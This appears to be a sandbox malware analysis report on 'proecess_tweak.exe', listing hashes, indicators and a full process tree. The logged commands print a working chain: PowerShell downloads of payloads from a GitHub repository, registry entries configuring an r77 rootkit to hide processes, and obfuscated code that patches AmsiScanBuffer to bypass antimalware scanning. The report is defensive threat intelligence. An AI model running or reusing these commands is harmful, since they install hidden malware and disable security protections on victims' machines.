Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
15s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2024, 15:11
Static task
static1
Behavioral task
behavioral1
Sample
proecess_tweak.exe
Resource
win10v2004-20240226-en
General
-
Target
proecess_tweak.exe
-
Size
152KB
-
MD5
405e17f3d0148a762938a52155cceec3
-
SHA1
a01e3615c65caf0349302176f8fe06c0287220ff
-
SHA256
6047361195df841490029d548ec39d414f6df48d1f0b1bbfb8bf0c7a697fff5a
-
SHA512
3dda3321d16132bd8ad3299b37d1331eeb69acb402168ec3be9fcab787ad49adb253f1744b27ac24380d3a5bb9fbad8a8e37fc02b3bc509972447d18f080da3d
-
SSDEEP
3072:ovGyYiSDnt1M5GWp1icKAArDZz4N9GhbkrNEk1Sq4:M4Op0yN90QEp
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4864 created 612 4864 powershell.exe 5 -
Blocklisted process makes network request 8 IoCs
flow pid Process 6 1932 powershell.exe 9 1932 powershell.exe 18 528 powershell.exe 19 528 powershell.exe 20 1904 powershell.exe 21 1904 powershell.exe 22 2272 powershell.exe 23 2272 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 3924 7z.exe 3972 Install.exe 1664 Install.exe -
Loads dropped DLL 1 IoCs
pid Process 3924 7z.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" proecess_tweak.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 8 raw.githubusercontent.com 9 raw.githubusercontent.com 19 raw.githubusercontent.com 21 raw.githubusercontent.com 23 raw.githubusercontent.com -
Drops file in System32 directory 27 IoCs
description ioc Process File created C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cs 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Helper32.exe 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Install.exe 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\r77-x64.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\Requtment.clx powershell.exe File created C:\Windows\System32\spool\tools\en-US\BytecodeApi.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\Helper32.exe 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Helper64.exe 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\r77-x86.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\7z.exe powershell.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cpp 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\BytecodeApi.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\salam.7z powershell.exe File created C:\Windows\System32\spool\tools\en-US\Helper64.exe 7z.exe File created C:\Windows\System32\spool\tools\en-US\Install.shellcode 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cs 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Install.shellcode 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\BytecodeApi.UI.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\r77-x86.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cpp 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Examples 7z.exe File created C:\Windows\System32\spool\tools\en-US\Examples\ControlPipe.cpp 7z.exe File created C:\Windows\System32\spool\tools\en-US\BytecodeApi.UI.dll 7z.exe File created C:\Windows\System32\spool\tools\en-US\Install.exe 7z.exe File created C:\Windows\System32\spool\tools\en-US\7z.dll powershell.exe File created C:\Windows\System32\spool\tools\en-US\r77-x64.dll 7z.exe File opened for modification C:\Windows\System32\spool\tools\en-US\Examples\ControlPipe.cpp 7z.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4864 set thread context of 1644 4864 powershell.exe 132 -
Delays execution with timeout.exe 1 IoCs
pid Process 2932 timeout.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1932 powershell.exe 1932 powershell.exe 528 powershell.exe 528 powershell.exe 1904 powershell.exe 1904 powershell.exe 2272 powershell.exe 2272 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 2084 powershell.EXE 2084 powershell.EXE 2684 powershell.EXE 2684 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeRestorePrivilege 3924 7z.exe Token: 35 3924 7z.exe Token: SeSecurityPrivilege 3924 7z.exe Token: SeSecurityPrivilege 3924 7z.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 2084 powershell.EXE Token: SeDebugPrivilege 2684 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1864 wrote to memory of 3232 1864 proecess_tweak.exe 86 PID 1864 wrote to memory of 3232 1864 proecess_tweak.exe 86 PID 3232 wrote to memory of 1932 3232 cmd.exe 88 PID 3232 wrote to memory of 1932 3232 cmd.exe 88 PID 3232 wrote to memory of 528 3232 cmd.exe 94 PID 3232 wrote to memory of 528 3232 cmd.exe 94 PID 3232 wrote to memory of 1904 3232 cmd.exe 97 PID 3232 wrote to memory of 1904 3232 cmd.exe 97 PID 3232 wrote to memory of 2272 3232 cmd.exe 99 PID 3232 wrote to memory of 2272 3232 cmd.exe 99 PID 3232 wrote to memory of 3924 3232 cmd.exe 102 PID 3232 wrote to memory of 3924 3232 cmd.exe 102 PID 3232 wrote to memory of 2932 3232 cmd.exe 103 PID 3232 wrote to memory of 2932 3232 cmd.exe 103 PID 3232 wrote to memory of 4300 3232 cmd.exe 104 PID 3232 wrote to memory of 4300 3232 cmd.exe 104 PID 3232 wrote to memory of 4400 3232 cmd.exe 105 PID 3232 wrote to memory of 4400 3232 cmd.exe 105 PID 3232 wrote to memory of 1544 3232 cmd.exe 106 PID 3232 wrote to memory of 1544 3232 cmd.exe 106 PID 3232 wrote to memory of 4792 3232 cmd.exe 107 PID 3232 wrote to memory of 4792 3232 cmd.exe 107 PID 3232 wrote to memory of 2368 3232 cmd.exe 108 PID 3232 wrote to memory of 2368 3232 cmd.exe 108 PID 3232 wrote to memory of 3056 3232 cmd.exe 109 PID 3232 wrote to memory of 3056 3232 cmd.exe 109 PID 3232 wrote to memory of 3060 3232 cmd.exe 110 PID 3232 wrote to memory of 3060 3232 cmd.exe 110 PID 3232 wrote to memory of 1812 3232 cmd.exe 111 PID 3232 wrote to memory of 1812 3232 cmd.exe 111 PID 3232 wrote to memory of 4740 3232 cmd.exe 112 PID 3232 wrote to memory of 4740 3232 cmd.exe 112 PID 3232 wrote to memory of 2888 3232 cmd.exe 113 PID 3232 wrote to memory of 2888 3232 cmd.exe 113 PID 3232 wrote to memory of 4888 3232 cmd.exe 114 PID 3232 wrote to memory of 4888 3232 cmd.exe 114 PID 3232 wrote to memory of 3944 3232 cmd.exe 115 PID 3232 wrote to memory of 3944 3232 cmd.exe 115 PID 3232 wrote to memory of 1796 3232 cmd.exe 116 PID 3232 wrote to memory of 1796 3232 cmd.exe 116 PID 3232 wrote to memory of 4852 3232 cmd.exe 117 PID 3232 wrote to memory of 4852 3232 cmd.exe 117 PID 3232 wrote to memory of 3828 3232 cmd.exe 118 PID 3232 wrote to memory of 3828 3232 cmd.exe 118 PID 3232 wrote to memory of 1736 3232 cmd.exe 119 PID 3232 wrote to memory of 1736 3232 cmd.exe 119 PID 3232 wrote to memory of 1056 3232 cmd.exe 120 PID 3232 wrote to memory of 1056 3232 cmd.exe 120 PID 3232 wrote to memory of 3972 3232 cmd.exe 121 PID 3232 wrote to memory of 3972 3232 cmd.exe 121 PID 3232 wrote to memory of 3972 3232 cmd.exe 121 PID 3232 wrote to memory of 1664 3232 cmd.exe 126 PID 3232 wrote to memory of 1664 3232 cmd.exe 126 PID 3232 wrote to memory of 1664 3232 cmd.exe 126 PID 3232 wrote to memory of 4864 3232 cmd.exe 131 PID 3232 wrote to memory of 4864 3232 cmd.exe 131 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132 PID 4864 wrote to memory of 1644 4864 powershell.exe 132
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{18311907-a241-493b-82f0-bb66fcfb5694}2⤵PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\proecess_tweak.exe"C:\Users\Admin\AppData\Local\Temp\proecess_tweak.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SYSTEM32\cmd.execmd /c "proecess_tweak.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/salam.7z -OutFile C:\Windows\System32\spool\tools\en-US\salam.7z"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/Requtment.clx -OutFile C:\Windows\System32\spool\tools\en-US\Requtment.clx"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/7z.exe -OutFile C:\Windows\System32\spool\tools\en-US\7z.exe"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/7z.dll -OutFile C:\Windows\System32\spool\tools\en-US\7z.dll"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\System32\spool\tools\en-US\7z.exe"C:\Windows\System32\spool\tools\en-US\7z.exe" x "C:\Windows\System32\spool\tools\en-US\salam.7z" -r -y -oC:\Windows\System32\spool\tools\en-US3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2932
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "wininit.exe" /t REG_SZ /d "wininit.exe" /f3⤵PID:4300
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "svchost.exe" /t REG_SZ /d "svchost.exe" /f3⤵PID:4400
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "csrss.exe" /t REG_SZ /d "csrss.exe" /f3⤵PID:1544
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "dwm.exe" /t REG_SZ /d "dwm.exe" /f3⤵PID:4792
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "lsass.exe" /t REG_SZ /d "lsass.exe" /f3⤵PID:2368
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "services.exe" /t REG_SZ /d "services.exe" /f3⤵PID:3056
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "warp-svc.exe" /t REG_SZ /d "warp-svc.exe" /f3⤵PID:3060
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "dllhost.exe" /t REG_SZ /d "dllhost.exe" /f3⤵PID:1812
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "audiodg.exe" /t REG_SZ /d "audiodg.exe" /f3⤵PID:4740
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "sihost.exe" /t REG_SZ /d "sihost.exe" /f3⤵PID:2888
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "smss.exe" /t REG_SZ /d "smss.exe" /f3⤵PID:4888
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "fontdrvhost.exe" /t REG_SZ /d "fontdrvhost.exe" /f3⤵PID:3944
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "ctfmon.exe" /t REG_SZ /d "ctfmon.exe" /f3⤵PID:1796
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "RuntimeBroker.exe" /t REG_SZ /d "RuntimeBroker.exe" /f3⤵PID:4852
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "taskhostw.exe" /t REG_SZ /d "taskhostw.exe" /f3⤵PID:3828
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "ApplicationFrameHost.exe" /t REG_SZ /d "ApplicationFrameHost.exe" /f3⤵PID:1736
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "conhost.exe" /t REG_SZ /d "conhost.exe" /f3⤵PID:1056
-
-
C:\Windows\System32\spool\tools\en-US\Install.exe"C:\Windows\System32\spool\tools\en-US\Install.exe"3⤵
- Executes dropped EXE
PID:3972
-
-
C:\Windows\System32\spool\tools\en-US\Install.exe"C:\Windows\System32\spool\tools\en-US\Install.exe"3⤵
- Executes dropped EXE
PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:nJPykIqMjSVN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MaGVQLeFRfdNbn,[Parameter(Position=1)][Type]$GptlgIUwiG)$OydsIqVoVAx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$OydsIqVoVAx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');$OydsIqVoVAx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$GptlgIUwiG,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');Write-Output $OydsIqVoVAx.CreateType();}$smGxynFlHuhkC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XJxqzvzRvDODYA=$smGxynFlHuhkC.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$izAjtDpTcIykCFLvLFo=nJPykIqMjSVN @([String])([IntPtr]);$zcszEmVRTVnMKlgIWZVgpJ=nJPykIqMjSVN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$clZdOUKBIWi=$smGxynFlHuhkC.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EVLGDNMGdOdUkU=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Load'+'LibraryA')));$tUgonAQzgoaRjxFau=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Vir'+'tual'+'Pro'+'tect')));$zXIxall=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVLGDNMGdOdUkU,$izAjtDpTcIykCFLvLFo).Invoke('a'+'m'+'si.dll');$LqcfvWYDFBJgJSDUM=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$zXIxall,[Object]('Ams'+'iSc'+'an'+'Buffer')));$LKXnSGWcBi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,4,[ref]$LKXnSGWcBi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$LqcfvWYDFBJgJSDUM,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,0x20,[ref]$LKXnSGWcBi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵PID:4824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OrcKlnKOHJta{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZkBOuMBKjzmISm,[Parameter(Position=1)][Type]$TTLjIuaxNc)$LORruiFvXUU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LORruiFvXUU.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');$LORruiFvXUU.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$TTLjIuaxNc,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');Write-Output $LORruiFvXUU.CreateType();}$HElwIrNbCPEps=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$NbBYFnZdLBdXUD=$HElwIrNbCPEps.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ObqsWLLoqAsNCkClHIu=OrcKlnKOHJta @([String])([IntPtr]);$JcstHrgkOadiYQpahjCtzI=OrcKlnKOHJta @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$amKDEwymedi=$HElwIrNbCPEps.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$wmFTlrkFCkPUwp=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Load'+'LibraryA')));$XLzSFTPCeGfSoakCk=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Vir'+'tual'+'Pro'+'tect')));$uhtiJOu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wmFTlrkFCkPUwp,$ObqsWLLoqAsNCkClHIu).Invoke('a'+'m'+'si.dll');$RdSeVohReyYAbPLiY=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$uhtiJOu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BAnzZuInjX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,4,[ref]$BAnzZuInjX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RdSeVohReyYAbPLiY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,0x20,[ref]$BAnzZuInjX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:nJPykIqMjSVN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MaGVQLeFRfdNbn,[Parameter(Position=1)][Type]$GptlgIUwiG)$OydsIqVoVAx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$OydsIqVoVAx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');$OydsIqVoVAx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$GptlgIUwiG,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');Write-Output $OydsIqVoVAx.CreateType();}$smGxynFlHuhkC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XJxqzvzRvDODYA=$smGxynFlHuhkC.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$izAjtDpTcIykCFLvLFo=nJPykIqMjSVN @([String])([IntPtr]);$zcszEmVRTVnMKlgIWZVgpJ=nJPykIqMjSVN 